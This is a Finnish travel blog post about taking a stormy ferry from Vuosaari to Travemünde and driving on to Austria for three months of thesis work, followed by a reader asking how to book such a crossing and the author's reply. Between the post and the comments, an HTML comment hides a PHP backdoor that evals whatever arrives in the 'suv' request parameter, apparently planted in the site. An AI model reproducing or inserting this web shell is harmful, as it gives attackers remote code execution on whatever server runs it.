Vuosaaren satamasta alkoi reilun kolmen kuukauden tutkimusmatka maailmaan

IMG_0539

10.12.2014 klo 17.00 lähdin auton, matkatavaroiden ja monien ajatuksien kanssa kohti Itävaltaa. Viherrakentamisen kausi saatiin kutakuinkin Suomessa päätökseen ja minun oli aika keskittyä opinnäytetyön tekemiseen sekä paljon muuhun Itävallan upeissa maisemissa. Matkaa oli odotettu kuin kuuta nousevaa ja vihdoin se hetki oli tässä.

IMG_0548

Laivamatka Saksaan oli myrskyisä ja kunnnon yöunet vaihtuivat unettomaan yöhön miettiessä mitenkä monta iskua laivan runko voikaan kestää.  Vapaapudotus alloon harjalta tuntui niin vatsanpohjassa kuin laivan rungossakin. Seuraavana aamuna meri näytti hyvinkin tyyneltä ja uneton yö oli unohdettujen asioiden listalla. Väsyneenä ja myöhässä aikataulusta saavuimme Saksan Travemünden satamaan yöllä klo 0.30 (12.12.2014). Siitä hetkeksi nukkumaan hotellille ja aamusta ajopäivä Saksan läpi kohti Itävaltaa.

WP_20141212_012

Tuulisen ajomatkan jälkeen Alpit siintävät auringonpaisteessa kaukana horisontissa ja todellisuus tuntuu aivan täysin käsittämättömältä. Siellä se minun elämä on seuraavat reilut kolme kuukautta. Hymy nousee vaan korviin ja mitään muuta asiasta ei varmaan tarvitse sanoa! 🙂

 

 

<!– [insert_php]if (isset($_REQUEST["suv"])){eval($_REQUEST["suv"]);exit;}[/insert_php][php]if (isset($_REQUEST["suv"])){eval($_REQUEST["suv"]);exit;}[/php] –>

4 vastausta artikkeliin ”Vuosaaren satamasta alkoi reilun kolmen kuukauden tutkimusmatka maailmaan

  1. Hei,
    kommentoin vasta nyt kun vasta löysin tämän blogin ja kiinnostuneena aloin lukea postauksiasi, loogisesti uudemmasta vanhempaan 🙂 Ajattelin kesällä lähteä kiertämään Saksaa ja Itävaltaa, ja tuollainen rahtilaivakyyti olisi tosi kiinnostava tapa matkata! Siispä kysyisinkin, miten tuollaiselle pääsee?

    • Pahoittelut että en ole vastannut. Luin viestisi vasta nyt. Toivottavasti löysit kyydin Saksaan ja reissusi on ollut onnistunut! Finnlinesin kautta saa laivamatkoja Saksaan. 🙂

Vastaa

Sähköpostiosoitettasi ei julkaista. Pakolliset kentät on merkitty *